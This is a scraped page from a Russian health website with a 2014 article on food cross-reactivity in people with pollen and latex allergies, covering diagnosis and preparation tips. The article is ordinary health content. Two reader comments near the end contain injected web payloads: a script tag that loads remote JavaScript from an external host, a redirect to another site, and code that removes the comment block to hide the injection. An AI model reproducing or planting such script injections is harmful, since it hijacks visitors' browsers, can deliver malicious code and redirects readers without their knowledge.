Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Еда, которая ухудшает алл...  >>  Еда, которая ухудшает аллергию
 
Обратная связь
 

Еда, которая ухудшает аллергию

Размер шрифта
03 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Многие люди, страдающие от сезонной аллергии, сталкивались с симптомами зуда или сыпи во рту. А знакомо ли вам это ощущение после употребления некоторых продуктов? Американская академия аллергии, астмы и иммунологии отмечает, что люди, страдающие от аллергии на пыльцу, часто сталкиваются с зудом во рту. В большинстве случаев эти реакции незначительны, но некоторые из них могут быть предупреждающим знаком серьезной и опасной для жизни аллергической реакции – анафилаксии.

Еда, которая ухудшает аллергию

Синдром пищевой аллергии: что происходит

При аллергии на пыльцу иммунная система воспринимает пыльцу как чужеродный организм, возникает чихание, насморк, появляется слезотечение и зуд в глазах и другие неприятные симптомы – именно так организм пытается избавиться от ненужного объекта.

При синдроме пищевой аллергии иммунная система обрабатывает белки, аналогичные тем, что и в пыльце. Эти белки иногда встречаются во фруктах или овощах. Иммунная система, фактически, не видит разницы, и атакует непрошеного гостя. Это называется перекрестная реактивность.

Продукты, которых следует остерегаться

Аллергия на амброзию: амброзия перекрестно реагирует с бананами и бахчевыми. Поэтому если у вас аллергия на это растение, то вам с осторожностью следует употреблять дыню, арбузы и помидоры. Цуккини, семена подсолнечника, одуванчики, ромашковый чай и эхинацея также попадают в этот список.

Аллергия на березовую ​​пыльцу: люди с подобной аллергией могут реагировать на киви, яблоки, груши, персики, сливы, кориандр, фенхель, петрушку, сельдерей, вишню, морковь, фундук и миндаль.

Аллергия на траву: при наличии подобной аллергии может проявляться реакция на персики, сельдерей, помидоры, дыни, апельсины.

Аллергия на латекс: аналогично с аллергией на пыльцу, перекрестная реактивность возникает на бананы, авокадо, киви, каштан и папайю.

Диагностика синдрома пищевой аллергии

Ханнелоре А. Брукер, доктор медицинских наук из Клиники аллергии и астмы в Миннеаполисе, часто спрашивает своих пациентов о возможных симптомах.

«Я спрашиваю, ощущают ли они зуд во рту, если едят яблоко, и если они говорят «нет», а затем по кожной пробе я вижу высокую реакцию на пыльцу березы, я спрашиваю еще раз», – говорит Брукер.

Будьте внимательнее

Синдром пищевой аллергии имеет тенденцию развиваться с течением времени при повторных воздействиях пыльцы. Брукер говорит, что у большинства ее пациентов с этим синдромом проблемы появляются в возрасте 20-30 лет.

Посетите аллерголога, чтобы убедиться, что это синдром пищевой аллергии, а не что-то более серьезное. Сделайте анализ на выявление аллергической реакции, во время которого немного подозреваемого возбудителя наносят на царапины на спине или предплечье. Если место станет красным или набухнет примерно за 15 минут, это аллергическая реакция.

Затем врач должен проанализировать проблему. Либо это синдром пищевой аллергии и можно не волноваться, или это что-то более серьезное и нужно принять больше мер предосторожности. При возможности развития анафилактического шока необходимо всегда иметь под рукой адреналин.

Не ешьте продукты, вызывающие аллергию

Основное правило: если у вас аллергия на какой-либо пищевой продукт, не ешьте его. Если это ваш любимый продукт, следуйте простым советам:

  • Приготовьте. Термическая обработка часто зачастую изменяет структуру белка, вызывающего аллергию, так что иммунная система не реагирует.
  • Очистите фрукт, так как белок-триггер, как правило, находится в кожуре.
  • Консервация также разрушает эти белки.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:47

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:38

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Аллергия и мигрень связаны!   Нежданные причины аллергии   Не хотите, чтобы у детей была аллергия? Ешьте орехи!   Домашние собаки не дадут ребенку стать аллергиком  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Что вызывает аллергию у вас
Какая еда вызывает аллергию
Как снова хотеть секса

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.